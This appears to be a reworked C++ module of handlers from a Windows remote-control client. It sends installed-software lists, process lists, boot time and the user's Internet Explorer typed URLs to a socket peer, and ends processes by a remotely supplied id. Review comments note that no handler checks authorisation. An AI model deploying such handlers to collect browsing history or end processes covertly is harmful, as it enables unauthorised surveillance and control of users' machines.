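//////////////leo///////////
// Host-inventory and process-control handlers. Each handler serves one request
// from the peer connected on socket `s`: the reporting handlers send fixed-size
// records through SendDataS, and TerminatePro reads a process id through
// RecvDataS.
// NOTE(review): none of these handlers checks that the peer is authorised to
// ask for this data or to end a process; confirm the dispatcher authenticates
// the session before any of them is reached.

// Copies src into dst, writing at most cap bytes including the terminator.
// Reading stops at the first NUL or after srcMax bytes, so src does not have
// to be NUL-terminated. Over-long input is truncated instead of overflowing dst.
static void CopyBounded(char *dst, size_t cap, const char *src, size_t srcMax)
{
    size_t n = 0;

    if (cap == 0)
        return;
    while (n + 1 < cap && n < srcMax && src[n] != '\0') {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
}

// True when text is empty or consists only of space characters.
static bool IsBlank(const char *text)
{
    while (*text == ' ')
        text++;
    return *text == '\0';
}

///////Installed software information///////
// Enumerates the subkeys of HKLM\...\Uninstall and sends one SOFTINFO record
// per subkey that carries a non-blank string "DisplayName".
//
// s      - socket the records are written to
// hEvent - event handle passed through to SendDataS
// Returns false only when a send fails; a key that cannot be opened yields
// true with nothing sent, as in the original.
// Assumes SOFTINFO.softname is a fixed-size char array (the record is sent as
// raw bytes with sizeof) - TODO confirm against the struct declaration.
bool SoftInfo(SOCKET s,WSAEVENT hEvent)
{
    static const char kUninstallKey[] = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
    SOFTINFO softinfo;
    DWORD retLen;
    HKEY hRoot, hProduct;
    char name[256];            // registry key names are at most 255 characters
    char displayName[200];
    DWORD index = 0;
    bool ok = true;

    // The function only reads, so it asks for read access rather than KEY_ALL_ACCESS.
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, kUninstallKey, 0, KEY_READ, &hRoot) != ERROR_SUCCESS)
        return true;

    for (;;) {
        DWORD nameLen = sizeof(name);
        DWORD type = 0;
        DWORD cb = sizeof(displayName) - 1;   // last byte stays 0 as terminator
        LONG rc;

        memset(name, 0, sizeof(name));
        rc = RegEnumKeyEx(hRoot, index++, name, &nameLen, NULL, NULL, NULL, NULL);
        if (rc == ERROR_NO_MORE_ITEMS)
            break;
        if (rc == ERROR_MORE_DATA)
            continue;
        if (rc != ERROR_SUCCESS)
            break;                            // a persistent error must not spin the loop
        if (name[0] == '\0')
            continue;

        // Open the product key relative to hRoot; no path string is assembled,
        // so a long subkey name cannot overflow a local buffer.
        if (RegOpenKeyEx(hRoot, name, 0, KEY_READ, &hProduct) != ERROR_SUCCESS)
            continue;

        memset(displayName, 0, sizeof(displayName));
        rc = RegQueryValueEx(hProduct, "DisplayName", NULL, &type, (LPBYTE)displayName, &cb);
        RegCloseKey(hProduct);                // closed on every path

        if (rc != ERROR_SUCCESS || (type != REG_SZ && type != REG_EXPAND_SZ))
            continue;
        if (IsBlank(displayName))
            continue;

        // Zero the record first so unused bytes of the struct are not sent as
        // whatever happened to be on the stack.
        memset(&softinfo, 0, sizeof(softinfo));
        CopyBounded(softinfo.softname, sizeof(softinfo.softname), displayName, sizeof(displayName));
        if (!SendDataS(s, (char*)&softinfo, sizeof(softinfo), &retLen, hEvent, SENDRECV_TIMEOUT)) {
            ok = false;
            break;
        }
    }

    RegCloseKey(hRoot);
    return ok;
}

///////Process information///////
// Queries the process list through NtQuerySystemInformation (information
// class 5) and sends one PROINFO record per entry: name, process id, share of
// the summed kernel+user time in percent, and working set in KiB.
//
// Returns false when the query is unavailable or fails, when the returned list
// is malformed, or when a send fails.
// Assumes PROINFO.proname is a fixed-size char array - TODO confirm.
bool ProInfo(SOCKET s,WSAEVENT hEvent)
{
    typedef long (__stdcall *NTQSI_FN)(DWORD, PVOID, DWORD, DWORD *);
    const DWORD dwInfoSize = 0x20000;
    PROINFO proinfo;
    DWORD retLen;
    PPROCESSINFO entry;
    __int64 totalTime = 0;
    bool ok = true;

    HMODULE hNtdll = GetModuleHandle("ntdll.dll");
    NTQSI_FN pfnQuery = hNtdll ? (NTQSI_FN)GetProcAddress(hNtdll, "NtQuerySystemInformation") : NULL;
    if (pfnQuery == NULL)
        return false;

    byte *buffer = new byte[dwInfoSize];
    if (buffer == NULL)
        return false;
    memset(buffer, 0, dwInfoSize);

    // A non-zero status (for example: buffer too small) leaves the buffer
    // without a valid list, so stop here instead of walking it.
    if (pfnQuery(5, buffer, dwInfoSize, NULL) != 0) {
        delete[] buffer;
        return false;
    }

    // Pass 1: sum the times of all entries and validate every link, so that a
    // bad dwOffset can never move the cursor outside the buffer.
    const byte *bufferEnd = buffer + dwInfoSize;
    entry = (PPROCESSINFO)buffer;
    for (;;) {
        totalTime += (__int64)entry->KernelTime.QuadPart + (__int64)entry->UserTime.QuadPart;
        if (entry->dwOffset == 0)
            break;
        size_t remaining = (size_t)(bufferEnd - (byte *)entry);
        if (entry->dwOffset > remaining || remaining - entry->dwOffset < sizeof(*entry)) {
            delete[] buffer;
            return false;
        }
        entry = (PPROCESSINFO)((byte *)entry + entry->dwOffset);
    }

    // Pass 2: the links were validated above and the buffer is unchanged.
    entry = (PPROCESSINFO)buffer;
    for (;;) {
        __int64 ownTime = (__int64)entry->KernelTime.QuadPart + (__int64)entry->UserTime.QuadPart;
        DWORD cpu = (totalTime > 0) ? (DWORD)(100 * ownTime / totalTime) : 0;   // no divide by zero

        char proname[64];
        memset(proname, 0, sizeof(proname));
        // Converting into size-1 bytes of a zeroed buffer keeps the result
        // terminated even when the name does not fit.
        if (entry->ProcessName.Buffer != NULL) {
            WideCharToMultiByte(CP_ACP, WC_COMPOSITECHECK, entry->ProcessName.Buffer, -1,
                                proname, sizeof(proname) - 1, NULL, NULL);
        }
        if (proname[0] == '\0')
            strcpy(proname, "系统空闲进程");   // label used for the entry without a name

        memset(&proinfo, 0, sizeof(proinfo));
        CopyBounded(proinfo.proname, sizeof(proinfo.proname), proname, sizeof(proname));
        proinfo.ID = entry->dwProcessID;
        proinfo.CPU = cpu;
        proinfo.memory = entry->dwWorkingSet / 1024;

        if (!SendDataS(s, (char*)&proinfo, sizeof(proinfo), &retLen, hEvent, SENDRECV_TIMEOUT)) {
            ok = false;
            break;
        }
        if (entry->dwOffset == 0)
            break;
        entry = (PPROCESSINFO)((byte *)entry + entry->dwOffset);
    }

    delete[] buffer;   // typed pointer: delete[] on a void* is undefined
    return ok;
}

///////Process termination///////
// Reads a DWORD process id from the socket and ends that process with exit
// code 0.
//
// Returns false when the id cannot be read in full, the process cannot be
// opened, or TerminateProcess fails.
// NOTE(review): the id is used exactly as received; nothing here restricts
// which processes the peer may end - confirm the caller enforces a policy.
bool TerminatePro(SOCKET s,WSAEVENT hEvent)
{
    DWORD retLen = 0;
    DWORD dwID = 0;

    if (!RecvDataS(s, (char*)&dwID, sizeof(dwID), &retLen, hEvent, SENDRECV_TIMEOUT) || retLen != sizeof(dwID))
        return false;

    // Only the terminate right is needed, and the handle is not inheritable.
    HANDLE hPro = OpenProcess(PROCESS_TERMINATE, FALSE, dwID);
    if (hPro == NULL)
        return false;

    BOOL ended = TerminateProcess(hPro, 0);
    CloseHandle(hPro);   // the original leaked this handle on every call
    return ended != FALSE;
}

///////Boot time information///////
// Reads the boot time through NtQuerySystemInformation(SystemTimeInformation),
// converts it to local time and sends it as one logInfo record with
// date "MM-DD-YYYY" and starttime "HH:MM:SS".
//
// Returns false when the query or a time conversion fails, or the send fails.
// Assumes logInfo.date and logInfo.starttime are fixed-size char arrays - TODO confirm.
bool Starttime(SOCKET s,WSAEVENT hEvent)
{
    PROCNTQSI NtQuerySystemInformation;
    logInfo loginfo;
    DWORD retLen;
    SYSTEM_TIME_INFORMATION Sti;
    LONG status;
    FILETIME ftBootUtc;
    FILETIME ftBootLocal;
    SYSTEMTIME stSystemBoot;
    char text[32];   // worst case is three 5-digit fields plus separators: 17 chars

    HMODULE hNtdll = GetModuleHandle("ntdll");
    if (!hNtdll)
        return false;
    NtQuerySystemInformation = (PROCNTQSI)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    if (!NtQuerySystemInformation)
        return false;

    memset(&Sti, 0, sizeof(Sti));
    status = NtQuerySystemInformation(SystemTimeInformation, &Sti, sizeof(Sti), 0);
    if (status != NO_ERROR)
        return false;

    // Copy the bytes instead of casting the address to FILETIME*.
    memcpy(&ftBootUtc, &Sti.liKeBootTime, sizeof(ftBootUtc));

    // FileTimeToLocalFileTime requires distinct input and output buffers, and
    // a failed conversion would leave stSystemBoot unset.
    if (!FileTimeToLocalFileTime(&ftBootUtc, &ftBootLocal))
        return false;
    if (!FileTimeToSystemTime(&ftBootLocal, &stSystemBoot))
        return false;

    memset(&loginfo, 0, sizeof(loginfo));

    sprintf(text, "%02d-%02d-%04d", stSystemBoot.wMonth, stSystemBoot.wDay, stSystemBoot.wYear);
    CopyBounded(loginfo.date, sizeof(loginfo.date), text, sizeof(text));

    sprintf(text, "%02d:%02d:%02d", stSystemBoot.wHour, stSystemBoot.wMinute, stSystemBoot.wSecond);
    CopyBounded(loginfo.starttime, sizeof(loginfo.starttime), text, sizeof(text));

    if (!SendDataS(s, (char*)&loginfo, sizeof(loginfo), &retLen, hEvent, SENDRECV_TIMEOUT))
        return false;
    return true;
}

///////IE information///////
// Enumerates the values under HKCU\Software\Microsoft\Internet Explorer\TypedUrls
// and sends the string data of each named value as one ieInfo record.
//
// Returns false only when a send fails; a key that cannot be opened yields
// true with nothing sent, as in the original.
// Assumes ieInfo.url is a fixed-size char array - TODO confirm.
bool IEinfo(SOCKET s,WSAEVENT hEvent)
{
    static const char kTypedUrlsKey[] = "Software\\Microsoft\\Internet Explorer\\TypedUrls";
    HKEY mkey;
    ieInfo ieinfo;
    REGEDIT regValue;
    DWORD retLen;
    DWORD index = 0;
    bool ok = true;

    if (RegOpenKeyEx(HKEY_CURRENT_USER, kTypedUrlsKey, 0, KEY_READ, &mkey) != ERROR_SUCCESS)
        return true;

    for (;;) {
        // Sizes come from the struct itself; one data byte is held back so the
        // zeroed buffer always ends in a terminator.
        DWORD namelen = sizeof(regValue.value);
        DWORD datalen = sizeof(regValue.data) - 1;
        LONG rc;

        memset(&regValue, 0, sizeof(regValue));
        rc = RegEnumValue(mkey, index++, regValue.value, &namelen, NULL,
                          &regValue.type, regValue.data, &datalen);
        if (rc == ERROR_NO_MORE_ITEMS)
            break;
        if (rc == ERROR_MORE_DATA)
            continue;                 // value too large for the record: skip it
        if (rc != ERROR_SUCCESS)
            break;
        regValue.datalen = datalen;

        if (regValue.value[0] == '\0')
            continue;
        // Only string data is copied as text.
        if (regValue.type != REG_SZ && regValue.type != REG_EXPAND_SZ)
            continue;

        memset(&ieinfo, 0, sizeof(ieinfo));
        CopyBounded(ieinfo.url, sizeof(ieinfo.url), (const char *)regValue.data, sizeof(regValue.data));
        if (!SendDataS(s, (char*)&ieinfo, sizeof(ieinfo), &retLen, hEvent, SENDRECV_TIMEOUT)) {
            ok = false;
            break;
        }
        // Kept from the original; presumably SendDataS reports a soft failure
        // through the last-error value - verify against its implementation.
        if (GetLastError() == MON_FUNERROR)
            break;
    }

    RegCloseKey(mkey);   // closed on every path, including a failed send
    return ok;
}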